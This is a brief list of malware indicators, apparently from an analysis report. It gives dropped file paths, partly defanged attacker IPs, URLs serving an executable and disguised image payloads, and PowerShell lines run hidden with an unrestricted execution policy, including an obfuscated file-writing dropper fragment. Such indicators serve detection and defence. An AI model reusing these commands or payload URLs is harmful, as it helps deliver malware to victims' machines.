Technical Information
- %APPDATA%\2.png
- %APPDATA%\original.exe
- '17#.#00.42.180':80
- '45.##3.201.7':80
- http://17#.#00.42.180/2.png
- http://17#.#00.42.180/Original.exe
- http://45.##3.201.7/windows.decoder.manager.form.madrid3_Usdmnyjj.bmp
- '%APPDATA%\original.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function kBVwfOZeMIckV($CYqLZw, $LqjXEDyFowweC){[IO.File]::WriteAllBytes($CYqLZw, $LqjXEDyFowweC)};function QFSmSKkQPoBdb($CYqLZw){if($CYqLZw.EndsWith((sbJTndDSTm...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwAA==' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwAA==